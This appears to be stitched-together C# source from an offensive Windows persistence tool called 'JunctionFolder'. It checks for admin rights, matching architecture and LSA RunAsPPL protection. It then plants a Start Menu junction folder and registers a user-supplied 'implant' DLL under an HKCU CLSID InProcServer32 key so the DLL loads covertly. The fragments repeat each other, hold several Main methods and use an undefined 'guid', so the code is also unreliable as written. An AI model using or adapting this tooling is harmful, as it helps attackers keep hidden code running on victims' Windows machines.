public static void PreflightChecks(string dllPath) { WindowsIdentity identity = WindowsIdentity.GetCurrent(); WindowsPrincipal principal = new WindowsPrincipal(identity); if (!principal.IsInRole(WindowsBuiltInRole.Administrator)) { Console.WriteLine("[-] You do not have admin privileges. Exiting."); return; } //Get OS arch if (!string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))) { Console.WriteLine("[+] Detected x86 system architecture."); osArch = "x86"; } else { Console.WriteLine("[+] Detected x64 system architecture."); osArch = "x64"; } //Get DLL arch MachineType type = GetDllMachineType(dllPath); string dllArch = null; if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386)) { Console.WriteLine("[+] Detected DLL x86 DLL architecture"); dllArch = "x86"; } else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64) || type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64)) { Console.WriteLine("[+] Detected DLL x64 DLL architecture"); dllArch = "x64"; } //Check for architecture match if (!dllArch.Equals(osArch)) { Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's."); } RegistryKey runAsPPL = Registry.LocalMachine.OpenSubKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL"); string runAsPPLVal = Convert.ToString(runAsPPL); if (String.IsNullOrEmpty(runAsPPLVal)) { Console.WriteLine("[+] RunAsPPL registry key not set!"); } else { Console.WriteLine("[-] RunAsPPL registry key set. Exiting..."); return; } }
static void Main(string[] args) { MachineType type = GetDllMachineType("path/to/MyAssembly.dll"); if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386)) { Console.WriteLine("Dll architecture: x86/32bit"); } else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64)) { Console.WriteLine("Dll architecture: x64/64bit"); } Console.ReadKey(); }
public static string getArch(string path) { MachineType dlltype = GetDllMachineType(path); if (dlltype.Equals(MachineType.IMAGE_FILE_MACHINE_I386)) { Console.WriteLine("Dll architecture: x86/32bit"); arch = "x86"; } else if (dlltype.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64)) { Console.WriteLine("Dll architecture: x64/64bit"); arch = "x64"; } return(arch); }
static void Main(string[] args) { //string b64Dll = "TVqQ..."; //byte[] dllBytes = Convert.FromBase64String(b64Dll); //File.WriteAllBytes(@"C:\temp\mydll.dll",) if (args.Length != 1) { Console.WriteLine("[-] Usage: JunctionFolder.exe <full path to DLL>"); Environment.Exit(1); } if (!File.Exists(args[0])) { Console.WriteLine("[-] DLL does not appear to exist on the system. Did you provide the full path?"); Environment.Exit(1); } if (!string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))) { Console.WriteLine("[+] Detected x86 system architecture."); osArch = "x86"; } else { Console.WriteLine("[+] Detected x64 system architecture."); osArch = "x64"; } MachineType type = GetDllMachineType(args[0]); string dllArch = null; if (type.Equals(MachineType.IMAGE_FILE_MACHINE_I386)) { Console.WriteLine("[+] Detected DLL x86 DLL architecture"); dllArch = "x86"; } else if (type.Equals(MachineType.IMAGE_FILE_MACHINE_IA64) || type.Equals(MachineType.IMAGE_FILE_MACHINE_AMD64)) { Console.WriteLine("[+] Detected DLL x64 DLL architecture"); dllArch = "x64"; } if (!dllArch.Equals(osArch)) { Console.WriteLine("[-] Detected architecture mismatch. Make sure your DLL architecture matches the host's."); Environment.Exit(1); } //Create the junction folder string implantDir = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), @"Microsoft\Windows\Start Menu\Programs\Accessories\"); string target = implantDir + "Indexing." + guid; try { Directory.CreateDirectory(target); } catch (Exception e) { Console.WriteLine("[-] Unable to create the junction folder"); Console.WriteLine(e); Environment.Exit(1); } Console.WriteLine("[+] Created junction folder at %APPDATA%/Indexing." + guid); //Set up the registry key string dllPath = args[0]; string key = @"SOFTWARE\Classes\CLSID\" + guid + @"\InProcServer32"; RegistryKey regkey = Registry.CurrentUser.CreateSubKey(key); try { regkey.SetValue("", dllPath); regkey.Close(); } catch (Exception e) { Console.WriteLine("[-] Could not write the registry key"); Console.WriteLine(e); Environment.Exit(1); } Console.WriteLine("[+] Registry key written"); }